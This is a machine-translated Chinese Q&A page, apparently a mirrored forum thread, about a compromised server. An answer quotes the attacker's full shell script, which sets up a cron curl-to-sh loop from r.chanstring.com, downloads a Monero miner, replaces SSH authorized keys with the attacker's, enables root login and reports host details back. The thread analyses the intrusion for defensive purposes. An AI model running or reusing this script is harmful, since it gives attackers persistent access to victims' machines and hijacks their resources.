回答
包裝盒中得到了妥協。
它下載一個腳本到你的服務器,並運行它
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
正如你可以看到它刪除所有SSH密鑰,併爲攻擊者登錄一個新的。
在腳本的最後報告其狀態到 curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=
UNAME -i`
該服務器再這樣他們就可以看到所有損害一次,我認爲
編輯服務器: 域名在巴拿馬註冊。 Whoopsie。我認爲你應該檢查你的服務器,並得到一些關於它的安全性的建議。
你說得對。所以我該怎麼做?他們是如何做到的? –
不能說他們用來在服務器上獲得這些信息,但它是安裝了後門或系統本身存在漏洞的服務 – KRONWALLED
我該如何解決這個問題?任何想法 ?或從他們已經安裝的位置? –
- 1. setUserData不執行aws腳本
- 2. 註銷WP中不必要的頁面上的腳本
- 3. rails腳本/生成跳過不必要的文件默認
- 4. 在Kentico現場管理/刪除不必要的腳本
- 5. Amazon AWS的Dockerfile腳本
- 6. AWS中的腳本elasticsearch
- 7. NSURL問題與不必要的文本?
- 8. CA1800:不要投不必要
- 9. AWS Lambda發佈後腳本?
- 10. ksh腳本中的「不必要的字符串到數字轉換」
- 11. PHP腳本的結構和範圍,以避免不必要的函數參數
- 12. WordprocessingDocument分離文本(不必要)
- 13. PHP腳本導致缺少必要的重定向uri錯誤
- 14. 去掉不必要的空白 - 「不必要」是鍵
- 15. AWS雲模板或自舉腳本幫助需要
- 16. 什麼可能會不必要地停止長時間運行的PHP腳本?
- 17. 將腳本從AWS EC2上傳到S3的Shell腳本
- 18. 不響應的腳本錯誤 - 需要確定腳本
- 19. jQuery^= vs | =。不必要?
- 20. AWS:生命週期腳本的順序?
- 21. 腳本的權限從AWS API網關
- 22. 使用python腳本的AWS ETL
- 23. 在AWS上創建文件的腳本
- 24. 插入AWS API憑證的腳本
- 25. Bash腳本:不需要的輸出
- 26. bash腳本給不需要的輸出
- 27. 不必要的換行.WRITE
- 28. 不必要的換行符
- 29. 不必要的邊界
- 30. 不必要的\字符
你沒有使用SSH密鑰嗎? –